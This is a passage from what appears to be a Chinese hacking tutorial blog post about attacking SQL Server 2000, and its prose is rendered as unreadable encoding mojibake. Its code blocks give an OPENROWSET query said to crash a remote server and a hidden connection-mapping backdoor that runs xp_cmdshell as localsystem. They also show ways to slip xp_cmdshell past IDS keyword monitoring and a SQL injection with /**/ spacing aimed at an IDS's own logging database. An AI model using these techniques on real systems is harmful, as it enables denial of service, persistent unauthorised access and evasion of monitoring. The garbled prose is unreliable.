select 'OK!'µÄ·µ»Ø¼¯ºÏÆÛÆÁ˱¾µØµÄselectÇëÇó£¬ÊÇÃüÁîÄܹ»Õý³£Ö´ÐУ¬Í¨Àísp_addsrvrolememberºÍopendatasourceÒ²¿ÉÒÔÈç´Ë²Ù×÷£¡ÖÁÓÚÕâ¸ö·½·¨ÕæÕýµÄÓô¦£¬´ó¼ÒÂýÂýÏë°É¡£
2£®¹ØÓÚMsdasqlÁ½´ÎÇëÇóµÄÎÊÌâ
²»ÖªµÀ´ó¼ÒÓÐûÓÐÊÔ¹ýÓÃmsdasqlÁ¬½ÓÔ¶³ÌÊý¾Ý¿â£¬µ±È»Õâ¸öapi±ØÐëÊÇsqlserverµÄ¹ÜÀíÔ±²Å¿ÉÒÔµ÷Óã¬ÄÇôÈçÏ£º
select * from openrowset('msdasql','driver={sql
server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','s
elect * from table1 select * from table2')
µ±table1ºÍtable2µÄ×Ö¶ÎÊýÄ¿²»Ïàͬʱ£¬Äã»á·¢ÏÖ¶Ô·½µÄsqlserver±ÀÀ£ÁË£¬Á¬±¾µØÁ¬½Ó¶¼»áʧ°Ü£¬¶øÏµÍ³×ÊÔ´Õ¼ÓÃÒ»ÇÐÕý³££¬ÓÃpskillɱËÀ sqlserver½ø³Ìºó£¬Èç¹û²»ÖØÆô»úÆ÷£¬sqlserverҪôÎÞ·¨Õý³£Æô¶¯£¬ÒªÃ´Ê±³£³öÏÖ·Ç·¨²Ù×÷£¬ÎÒÒ²Ö»ÊÇÅöÇÉÕÒµ½Õâ¸öbugµÄ£¬¾ßÌåÔÒòÎÒ»¹Ã»ÓÐÃþ͸£¬¶øÇ񼆮æ¹ÖµÄÊÇÕâ¸öÏÖÏóÖ»³öÏÖÔÚmsdasqlÉÏ£¬sqloledb¾ÍûÓÐÕâ¸öÎÊÌ⣬¿´À´ÎÊÌâ²»ÊÇÔÚÓÚÇëÇ󼯺ÏÊýÄ¿ºÍ·µ»Ø¼¯ºÏÊýÄ¿²»Æ¥ÅäÉÏ£¬Ó¦¸Ã»¹ÊÇmsdasql±¾ÉíµÄÎÊÌ⣬¾ßÌåÔÒò£¬´ó¼ÒÒ»ÆðÂýÂýÑо¿°É¡£
3£®¿ÉŵĺóÃÅ
ÒÔǰÔÚÍøÉÏ¿´µ½ÓÐÈË˵ÔÚ sqlserverÉÏÁôºóÃÅ¿ÉÒÔͨ¹ýÌí¼Ótriger¡¢jobs»ò¸Äдsp_addloginºÍsp_addsrvrolemember×öµ½£¬ÕâЩ·½·¨µ±È»¿ÉÐУ¬µ«ÊǺÜÈÝÒ׻ᱻ·¢ÏÖ¡£²»ÖªµÀ´ó¼ÒÓÐûÓÐÏë¹ýsqloledbµÄ±¾µØÁ¬½ÓÓ³Éä¡£ºÇºÇ£¬±ÈÈçÄãÔÚ¶Ô·½µÄsqlserverÉÏÓÃsqlserverµÄ¹ÜÀíÔ±Õ˺ÅÖ´ÐÐÈçϵÄÃüÁ
select * from openrowset('sqloledb','trusted_connection=yes;data
source=Hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')
ÕâÑùÔÚ¶Ô·½µÄ sqlserverÉϽ¨Á¢ÁËÒ»¸öÃûΪHecticµÄ±¾µØÁ¬½ÓÓ³É䣬ֻҪsqlserver²»ÖØÆô£¬Õâ¸öÓ³Éä»áÒ»Ö±´æÔÚÏÂÈ¥£¬ÖÁÉÙÎÒÏÖÔÚ»¹²»ÖªµÀÈçºÎ·¢ÏÖ±ðÈË·ÅÖõÄÁ¬½ÓÓ³É䣬ºÃÁË£¬ÒÔÉϵÄÃüÁîÔËÐйýºó£¬Äã»á·¢ÏÖÄÄÅÂÊÇsqlserverûÓÐÈκÎȨÏÞµÄguestÓû§£¬ÔËÐÐÒÔÉÏÕâÌõÃüÁîÒ²Ò»ÑùÄÜͨ¹ý£¡¶øÇÒȨÏÞÊÇ localsystem£¡£¨Ä¬Èϰ²×°£©ºÇºÇ£¡Õâ¸ö·½·¨¿ÉÒÔÓÃÀ´ÔÚÒÔ±»ÈëÇÖ¹ý»ñµÃ¹ÜÀíԱȨÏÞµÄsqlserverÉÏÁôÏÂÒ»¸öºóÃÅÁË¡£ÒÔÉϵķ½·¨ÔÚ sqlserver2000 sqlserver2000SP1ÉÏͨ¹ý£¡
ÁíÍ⻹ÓÐÒ»¸ö²Â²â£¬²»ÖªµÀ´ó¼ÒÓÐûÓÐ×¢Òâ¹ýwindowsĬÈϸ½´øµÄÁ½¸ödsn£¬Ò»¸öÊÇlocalserverÒ»¸öÊÇmsqi£¬ÕâÁ½¸öÔÚ½¨Á¢µÄʱºòÊDZ¾µØ¹ÜÀíÔ±Õ˺ÅÁ¬½ÓsqlserverµÄ£¬Èç¹û¶Ô·½µÄ sqlserverÊÇͨ¹ý×Ô¶¨ÒåµÄpower userÆô¶¯£¬ÄÇôsaµÄȨÏ޾ͺÍpower userÒ»Ñù£¬ºÜÄÑÓÐËù´ó×÷Ϊ£¬µ«ÊÇÎÒÃÇͨ¹ýÈçϵÄÃüÁ
select * from openrowset
('msdasql','dsn=locaserver;trusted_connection=yes','set fmtonly off exec
master..xp_cmdshell ''dir c:\''')
Ó¦¸Ã¿ÉÒÔÀûÓÃlocalserverµÄ¹ÜÀíÔ±Õ˺ÅÁ¬½Ó±¾µØsqlserverÈ»ºóÔÙÒÔÕâ¸öÕ˺ŵÄȨÏÞÖ´Ðб¾µØÃüÁîÁË£¬ÕâÊǺóÎÒÏëÓ¦¸ÃÄÜÍ»ÆÆsaÄǸöpower userȨÏÞÁË¡£ÏÖÔÚµÄÎÊÌâÊÇsqloledbÎÞ·¨µ÷ÓÃdsnÁ¬½Ó£¬¶ømsdasql·Ç¹ÜÀíÔ±²»Èõ÷Óã¬ËùÒÔÎÒÏÖÔÚÕýÔÚѰÕÒguestµ÷ÓÃmsdasql µÄ·½·¨¡£
Èç¹ûÓÐÈËÖªµÀÕâ¸öbugÈçºÎÍ»ÆÆ£¬»òÓÐеÄÏë·¨£¬ÎÒÃÇ¿ÉÒÔÒ»ÆðÌÖÂÛһϣ¬Õâ¸ö·¢·ÅÈç¹ûÄܳɹ¦±»guestÀûÓ㬽«»áÊÇÒ»¸öºÜÑÏÖØµÄ°²È«Â©¶´¡£ÒòΪÎÒÃÇÇ°ÃæÌáµ½µÄÈκÎsqlÓï¾ä¶¼¿ÉÒÔÌá½»¸ø¶Ô·½µÄaspÈ¥°ïÎÒÃÇÖ´ÐС£
4£®ÀûÓÃT-sqlƹýIds»ò¹¥»÷Ids
ÏÖÔÚµÄidsÒѾ±äµÃÔ½À´Ô½´ÏÃ÷ÁË¡£ÓеÄids¼ÓÈëÁËxp_cmdshell sp_addlogin µÄ¼àÊÓ£¬µ«ÊDZϾ¹È˹¤ÖÇÄÜûÓгöÏֵĽñÌ죬ÕâÖÖ¼àÊÓ×ÜÊÇÓÐÖÖÆÈ˵ĸоõ¡£
ÏÈ˵˵ÆÛÆIds
ids¼ÈÈ»¼àÊÓxp_cmdshell¹Ø¼ü×Ö£¬ÄÇôÎÒÃÇ¿ÉÒÔÕâô×ö£º
declare @a sysname set @a="xp_" "cmdshell" exec @a 'dir c:\'
Õâ¸ö´úÂëÏàÐÅ´ó¼Ò¶¼ÄÜ¿´Ã÷°×£¬»¹ÓÐxp_cmdshell×÷Ϊһ¸östore procedureÔÚmaster¿âÄÚÓÐÒ»¸öidºÅ£¬¹Ì¶¨µÄ£¬ÎÒÃÇÒ²¿ÉÒÔÕâô×ö£º
¼ÙÉèÕâ¸öid=988456
declare @a sysname select @a=name from sysobjects where id=988456
exec @a 'dir c:\'
µ±È»Ò²¿ÉÒÔ£º
declare @a sysname select @a=name from sysobjects where id=988455 1
exec @a 'dir c:\'
ÕâÖÖ×ö·¨ÅÅÁÐ×éºÏ£¬ids¸ù±¾²»¿ÉÄÜ×öµÄµ½ÍêÈ«¼àÊÓ¡£Í¬Àí£¬sp_addloginÒ²¿ÉÒÔÕâô×ö¡£
ÔÙ˵˵¹¥»÷Ids
ÒòΪidsÊý¾ÝÁ¿ºÜ´ó£¬ÈÕÖÁͨ³£±¸·Ýµ½³£¹æÊý¾Ý¿â£¬±ÈÈçsql server¡£
Èç¹ûÓùÅÀϵÄrecordset.addnew×ö·¨£¬»áÑÏÖØÓ°ÏìidsµÄÐÔÄÜ£¬ÒòΪͨ¹ýado×öt-sqlÇëÇ󣬲»µ«Ð§Âʸߣ¬¶øÇÒÓÐÒ»²¿·Ö¹¤×÷¿ÉÒÔ½»¸øsql server È¥×ö£¬Í¨³£³ÌÐò»áÕâôд£º
insert table values ('ÈÕÖÁÄÚÈÝ'£¬...)
ÄÇôÎÒÃÇÏëÏë¿´£¬Èç¹ûÓà temp') exec xp_cmdshell 'dir c:\' -- Ìá½»ºó»á±ä³É£º
insert table values ('ÈÕÖÁÄÚÈÝ'....'temp') exec xp_cmdshell 'dir
c:\' -- ')
ÕâÑù£¬xp_cmdshell¾Í¿ÉÒÔÔÚidsµÄÊý¾Ý¿âÔËÐÐÁË¡£µ±È»idsÊÇÒ»¸öÐá̾Æ÷£¬Ëû»á×¥ËùÓеı¨£¬¶øä¯ÀÀÆ÷Ìá½»µÄʱºò»á°Ñ¿Õ¸ñ±ä³É ¡£Òò´Ë£¬ »á±»Ìá½»µ½sql server£¬ÕâÑùÄãµÄÃüÁî¾ÍÎÞ·¨Ö´ÐÐÁË¡£ ΨһµÄ°ì·¨¾ÍÊÇ£º
insert/**/table/**/values('ÈÕÖÁÄÚÈÝ'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')
ÓÃ/**/´úÌæ¿Õ¸ñ×ö¼ä¸ô·û£¬ÕâÑùÄãµÄt-sql²ÅÄÜÔÚidsµÄÊý¾Ý¿âÄÚÖ´ÐС£µ±È»Ò²¿ÉÒÔÓÃÆäËûÓï¾ä£¬¿ÉÒÔÆÆ»µ£¬±¸·ÝidsµÄÊý¾Ý¿âµ½ÄãµÄ¹²ÏíĿ¼£¬ºÇºÇ¡£
ÆäʵÕâÖÖ·½·¨µÄÔÀíºÍ¹¥»÷aspÊÇÒ»ÑùµÄ£¬Ö»Êǰѿոñ±ä³ÉÁË/**/ ¡£±¾À´aspÊÇselectÓï¾ä£¬ÄÇôÓÃ'¾Í¿ÉÒÔÆÁ±Î¡£ÏÖÔÚidsÓÃinsertÓï¾ä£¬ÄÇôÓÃ')ÆÁ±Î¡£
ºÃÁË£¬ÆäËûºÜ¶àеÄÈëÇÖÓï¾ä´ó¼Ò¿ÉÒÔ×Ô¼ºÂýÂýÏ룬×îºÃµÄ²âÊÔ¹¤¾ß¾ÍÊÇquery analyzerÁË¡£
|
|
| |
|
¹Ø¼ü×Ö:
| ¹Ø¼ü×Ö: ÍøÂ簲ȫÈëÃÅ֪ʶ16ÎÊ´ð,²©Ö¾,soft,glen'blog,blog,weblog,blog,qzhiwu@msn.com |
|
ÒýÓÃ [0]
| ±¾ÎÄÎÞTrackback |
 |
|
Ìí¼ÓÆÀÂÛ
|
|